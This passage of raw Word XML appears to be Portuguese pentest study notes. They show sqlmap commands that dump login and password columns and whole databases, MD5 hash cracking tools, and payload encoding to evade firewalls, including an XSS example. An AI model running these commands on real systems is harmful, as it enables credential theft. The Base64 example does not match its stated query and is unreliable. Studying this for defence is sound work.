        </w:rPr>
        <w:t>tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B29B06" w14:textId="77777777" w:rsidR="00AE015C" w:rsidRDefault="00AE015C" w:rsidP="00DB3862">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F97A268" w14:textId="6FF030A2" w:rsidR="00AE015C" w:rsidRDefault="00AE015C" w:rsidP="00AE015C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Para listar todas as colunas de uma tabela no banco:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473E1DDD" w14:textId="2D18CC17" w:rsidR="00AE015C" w:rsidRDefault="00AE015C" w:rsidP="00AE015C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sqlmap -r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./Documents/requestHeader.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">–D </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">bancocn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">–T </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">users </w:t>
      </w:r>
      <w:r w:rsidR="00A17875">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523A34AB" w14:textId="77777777" w:rsidR="00E61808" w:rsidRDefault="00E61808" w:rsidP="00AE015C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31BF8F6D" w14:textId="114F7D59" w:rsidR="00E61808" w:rsidRDefault="00E61808" w:rsidP="00E61808">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Para selecionar as colunas de uma tabela no banco</w:t>
      </w:r>
      <w:r w:rsidR="00FB07A4">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:r w:rsidR="00A17875">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>pegar</w:t>
      </w:r>
      <w:r w:rsidR="00FB07A4">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> os dados</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8350CC" w14:textId="15EDECCF" w:rsidR="00E61808" w:rsidRDefault="00E61808" w:rsidP="00E61808">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Comando</w:t>
      </w:r>
      <w:r w:rsidRPr="006611E9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="006611E9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sqlmap -r</w:t>
      </w:r>
      <w:r w:rsidRPr="006611E9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./Documents/requestHeader.txt </w:t>
      </w:r>
      <w:r w:rsidRPr="006611E9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">–D </w:t>
      </w:r>
      <w:r w:rsidRPr="006611E9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">bancocn </w:t>
      </w:r>
      <w:r w:rsidRPr="006611E9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">–T </w:t>
      </w:r>
      <w:r w:rsidRPr="006611E9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">users </w:t>
      </w:r>
      <w:r w:rsidRPr="006611E9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-C </w:t>
      </w:r>
      <w:r w:rsidRPr="006611E9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">login,password </w:t>
      </w:r>
      <w:r w:rsidR="00193CBD">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="006611E9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607DB30D" w14:textId="77777777" w:rsidR="0042140A" w:rsidRDefault="0042140A" w:rsidP="0042140A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="716812FA" w14:textId="30CF77FD" w:rsidR="0042140A" w:rsidRDefault="0042140A" w:rsidP="0042140A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Para baixar todo o banco de dados:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641750AB" w14:textId="371636B8" w:rsidR="00AE015C" w:rsidRDefault="0042140A" w:rsidP="000E7F34">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Comando: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -r </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">./Documents/requestHeader.txt </w:t>
      </w:r>
      <w:r w:rsidR="00EE1B78">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dump-all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1F07EF" w14:textId="77777777" w:rsidR="000E7F34" w:rsidRDefault="000E7F34" w:rsidP="00DB3862">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5383C45B" w14:textId="4D4D193F" w:rsidR="000E7F34" w:rsidRPr="00DB3862" w:rsidRDefault="000E7F34" w:rsidP="00DB3862">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21CE6679" wp14:editId="401B6AA0">
            <wp:extent cx="5400040" cy="2337435"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1222637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72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F406" w14:textId="77777777" w:rsidR="00727F97" w:rsidRDefault="00727F97" w:rsidP="0046644A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46935EC3" w14:textId="4873B8F8" w:rsidR="00727F97" w:rsidRDefault="00727F97" w:rsidP="002910BC">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00727F97">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>A ferramenta hash-identifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D4E4C5" w14:textId="02590CD2" w:rsidR="00727F97" w:rsidRDefault="00727F97" w:rsidP="00727F97">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C2B757" w14:textId="17AA9F70" w:rsidR="00727F97" w:rsidRDefault="00606DE4" w:rsidP="00727F97">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Essa ferramenta</w:t>
      </w:r>
      <w:r w:rsidR="006435AA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006435AA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hash-identifier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> no Kali, vai te dizer qual é o tipo de HASH que foi gerada, por exemplo, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C46EF2">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a HASH no formato MD5, é bastante conhecida e facilmente de ser quebrada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ABA5A5" w14:textId="77777777" w:rsidR="001E05E6" w:rsidRDefault="001E05E6" w:rsidP="00727F97">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="627B5DE2" w14:textId="21EA4C29" w:rsidR="001E05E6" w:rsidRDefault="001E05E6" w:rsidP="00727F97">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Se você pesquisar por MD5 Hash Decrypt, no Google, irá encontrar diversos decryptadores online.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528306FB" w14:textId="3465496C" w:rsidR="00451C44" w:rsidRPr="00727F97" w:rsidRDefault="00451C44" w:rsidP="00727F97">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">Tem uma ferramenta chamada </w:t>
      </w:r>
      <w:r w:rsidRPr="00D04B2C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HashKiller</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> no github que se pode clonar para sua máquina.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CE54EC" w14:textId="77777777" w:rsidR="009E5B4F" w:rsidRPr="00B12218" w:rsidRDefault="009E5B4F" w:rsidP="006E7A3B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73A20F76" w14:textId="7F5F6959" w:rsidR="009E5B4F" w:rsidRDefault="009E5B4F" w:rsidP="009E5B4F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E5B4F">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Em um pentest real, p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>ode haver um firewall que esteja bloqueando essas palavras chaves que geralmente são utilizadas em ataques de SQL injection. Nessas situações, teria que fazer uso de várias técnicas para burlar o firewall</w:t>
      </w:r>
      <w:r w:rsidR="003539BB">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>, encodar os payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A21BE9" w14:textId="77777777" w:rsidR="00FF190E" w:rsidRDefault="00FF190E" w:rsidP="009E5B4F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C754B04" w14:textId="0C750705" w:rsidR="00FF190E" w:rsidRDefault="00FF190E" w:rsidP="002910BC">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observação</w:t>
      </w:r>
      <w:r w:rsidR="00752DCA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (O que é um payload)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7148ACDD" w14:textId="77777777" w:rsidR="009131F4" w:rsidRDefault="009131F4" w:rsidP="009E5B4F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53068CD8" w14:textId="08C37249" w:rsidR="00752DCA" w:rsidRPr="00752DCA" w:rsidRDefault="00752DCA" w:rsidP="009E5B4F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00752DCA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> termo "payload" refere-se à parte de um ataque ou exploração que realiza a ação desejada do atacante.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00752DCA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">Em contextos de segurança, um payload geralmente </w:t>
      </w:r>
      <w:r w:rsidRPr="00752DCA">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>consiste em código malicioso que é executado para explorar uma vulnerabilidade ou comprometer um sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2989E105" w14:textId="77777777" w:rsidR="00752DCA" w:rsidRDefault="00752DCA" w:rsidP="009E5B4F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E9DF780" w14:textId="5407CC10" w:rsidR="00FF190E" w:rsidRPr="002D16A8" w:rsidRDefault="00FF190E" w:rsidP="002D16A8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FF190E">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"Encodar os payloads"</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF190E">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> refere-se ao processo de codificar ou ocultar dados maliciosos, muitas vezes utilizados em ataques, de maneira a evitar detecção por sistemas de segurança. Isso é comumente feito ao manipular strings de caracteres especiais, valores hexadecimais, ou codificações específicas para ofuscar a natureza maliciosa de um payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737C0D4A" w14:textId="77777777" w:rsidR="00FF190E" w:rsidRDefault="00FF190E" w:rsidP="00FF190E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF190E">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>No contexto de segurança da informação e cibersegurança, a codificação de payloads é frequentemente usada em ataques como SQL Injection, Cross-Site Scripting (XSS), e outros, onde os atacantes tentam injetar código malicioso em sistemas alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CBC4A1" w14:textId="77777777" w:rsidR="007A4502" w:rsidRPr="00FF190E" w:rsidRDefault="007A4502" w:rsidP="00FF190E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7916D148" w14:textId="77777777" w:rsidR="00FF190E" w:rsidRPr="00FF190E" w:rsidRDefault="00FF190E" w:rsidP="00FF190E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF190E">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Exemplos de técnicas de codificação ou encodação incluem</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF190E">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B67ABAB" w14:textId="77777777" w:rsidR="00FF190E" w:rsidRPr="00FF190E" w:rsidRDefault="00FF190E" w:rsidP="007A4502">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF190E">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>URL Encoding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5331AA58" w14:textId="77777777" w:rsidR="00FF190E" w:rsidRDefault="00FF190E" w:rsidP="00FF190E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF190E">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exemplo</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF190E">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF190E">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>alert('XSS')</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF190E">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> pode ser codificado como </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF190E">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>alert%28%27XSS%27%29</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF190E">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> para ser transmitido em uma URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF190E">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F03B7C" w14:textId="77777777" w:rsidR="00AA51AB" w:rsidRPr="00FF190E" w:rsidRDefault="00AA51AB" w:rsidP="00AA51AB">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3360C91D" w14:textId="77777777" w:rsidR="00FF190E" w:rsidRPr="00FF190E" w:rsidRDefault="00FF190E" w:rsidP="007A4502">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF190E">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Base64 Encoding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23101A87" w14:textId="77777777" w:rsidR="00FF190E" w:rsidRPr="002910BC" w:rsidRDefault="00FF190E" w:rsidP="00FF190E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF190E">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exemplo: SELECT * FROM users WHERE username = 'admin';</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF190E">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> pode ser codificado como </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF190E">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>U0VMRUNUICogRlJPTSB1c2VycyBXaGVuIFVzZXIgVXNlcm5hbWUgPSAnYWRtaW4nOw==.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5A4DB0" w14:textId="77777777" w:rsidR="002910BC" w:rsidRPr="00FF190E" w:rsidRDefault="002910BC" w:rsidP="00AA51AB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BD68156" w14:textId="77777777" w:rsidR="00FF190E" w:rsidRPr="00FF190E" w:rsidRDefault="00FF190E" w:rsidP="007A4502">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
